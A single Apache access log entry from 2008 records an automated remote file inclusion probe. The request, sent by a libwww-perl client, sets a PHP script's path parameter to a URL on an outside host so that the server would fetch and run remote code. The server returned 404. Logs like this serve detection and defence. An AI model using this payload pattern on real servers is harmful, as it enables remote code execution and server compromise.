201.238.195.13 - - [02/Sep/2008:00:57:40 -0400] "GET /logs/access_log.Q108082000/phphtml.php?htmlclass_path=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
